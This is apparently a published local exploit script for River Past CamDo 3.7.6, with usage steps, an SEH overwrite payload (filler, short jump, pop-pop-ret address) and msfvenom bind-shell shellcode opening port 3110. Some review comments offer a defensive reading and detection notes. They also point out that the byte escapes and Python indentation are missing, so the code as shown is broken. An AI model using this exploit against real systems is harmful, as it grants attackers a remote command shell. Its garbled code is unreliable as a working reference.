# Exploit Title: River Past CamDo SEH Local Exploit
# Date: 07.02.2019
# Vendor Homepage:www.riverpast.com
# Software Link: https://en.softonic.com/download/river-past-cam-do/windows/post-download?sl=1
# Exploit Author: Achilles
# Tested Version: 3.7.6
# Tested on: Windows XP SP3 EN

# 1.- Run python code : CamDo.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open CamDo.exe and click on 'Options' inside the 'File' menu.
# 4.- Paste the Content of EVIL.txt into the 'Lame_enc.dll' name field.
# 5.- Click 'OK' and you will have a bind shell port 3110.


#!/usr/bin/env python
import struct

# Building blocks of the string that the header steps paste into the
# 'Lame_enc.dll' name field. They are concatenated further down as
# buffer + NSEH + SEH + nops + shellcode.
#
# NOTE(review): as rendered on this page the string literals carry no
# backslash escapes, so each "xNN" group is plain text, not a single byte.
#
# Defensive reading: the field presumably lacks a length check, and the
# handler value below is one fixed address. A fixed address is only usable
# when the named module loads at the same base on every run and is not
# covered by /SAFESEH or SEHOP; the page claims Windows XP SP3 only.
# TODO confirm whether rvddshow2.dll in current builds is linked with
# /SAFESEH and /DYNAMICBASE.

# Filler placed before the exception-registration record; the count of 280
# is the author's value for version 3.7.6 and is not derivable from this page.
buffer = "x41" * 280
# Value for the "next handler" slot; the author labels it a short jump.
NSEH = "xebx06x90x90" #jmp short 6
# Handler slot: 0x10010b0b packed as a little-endian unsigned 32-bit value.
# The author attributes the address to rvddshow2.dll.
SEH = struct.pack('<L',0x10010b0b) #pop pop ret rvddshow2.dll
# 20 repetitions of the padding literal placed between handler and blob.
nops = "x90" * 20

#badchar x00x0ax0dx2f
#msfvenom -p windows/shell_bind_tcp LPORT=3110 -a x86 -b 'x00x0ax0dx2f' -f python

# Opaque encoded blob. Per the author's comment above it is msfvenom output
# for windows/shell_bind_tcp on port 3110 with the listed bytes excluded;
# the contents cannot be audited from this listing.
#
# Detection notes, based on what the header claims (step 5): the observable
# effect would be a TCP listener on port 3110 owned by CamDo.exe. That
# process presumably also starts a command interpreter as a child; verify
# against endpoint telemetry before relying on it as a signature.
shellcode = ("xb8x9cx94x39x34xdbxdaxd9x74x24xf4x5ax33"
"xc9xb1x53x31x42x12x03x42x12x83x5ex90xdb"
"xc1xa2x71x99x2ax5ax82xfexa3xbfxb3x3exd7"
"xb4xe4x8ex93x98x08x64xf1x08x9ax08xdex3f"
"x2bxa6x38x0exacx9bx79x11x2exe6xadxf1x0f"
"x29xa0xf0x48x54x49xa0x01x12xfcx54x25x6e"
"x3dxdfx75x7ex45x3cxcdx81x64x93x45xd8xa6"
"x12x89x50xefx0cxcex5dxb9xa7x24x29x38x61"
"x75xd2x97x4cxb9x21xe9x89x7exdax9cxe3x7c"
"x67xa7x30xfexb3x22xa2x58x37x94x0ex58x94"
"x43xc5x56x51x07x81x7ax64xc4xbax87xedxeb"
"x6cx0exb5xcfxa8x4ax6dx71xe9x36xc0x8exe9"
"x98xbdx2ax62x34xa9x46x29x51x1ex6bxd1xa1"
"x08xfcxa2x93x97x56x2cx98x50x71xabxdfx4a"
"xc5x23x1ex75x36x6axe5x21x66x04xccx49xed"
"xd4xf1x9fx98xdcx54x70xbfx21x26x20x7fx89"
"xcfx2ax70xf6xf0x54x5ax9fx99xa8x65x93x7f"
"x24x83xc1x6fx60x1bx7dx52x57x94x1axadxbd"
"x8cx8cxe6xd7x0bxb3xf6xfdx3bx23x7dx12xf8"
"x52x82x3fxa8x03x15xb5x39x66x87xcax13x10"
"x24x58xf8xe0x23x41x57xb7x64xb7xaex5dx99"
"xeex18x43x60x76x62xc7xbfx4bx6dxc6x32xf7"
"x49xd8x8axf8xd5x8cx42xafx83x7ax25x19x62"
"xd4xffxf6x2cxb0x86x34xefxc6x86x10x99x26"
"x36xcdxdcx59xf7x99xe8x22xe5x39x16xf9xad"
"x4ax5dxa3x84xc2x38x36x95x8exbaxedxdaxb6"
"x38x07xa3x4cx20x62xa6x09xe6x9fxdax02x83"
"x9fx49x22x86")


# Final field content: filler, the two record slots, padding, then the blob.
payload = buffer + NSEH + SEH + nops + shellcode


# Write the assembled string to Evil.txt in the current working directory
# and report its length. The header steps refer to the file as EVIL.txt;
# the names differ only in case.
#
# NOTE(review): the try/except bodies have lost their indentation on this
# page, and the print statements are Python 2 syntax.
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
# The bare except catches every exception and prints one generic message,
# so the actual cause of a failure is not reported.
except:
print "File cannot be created"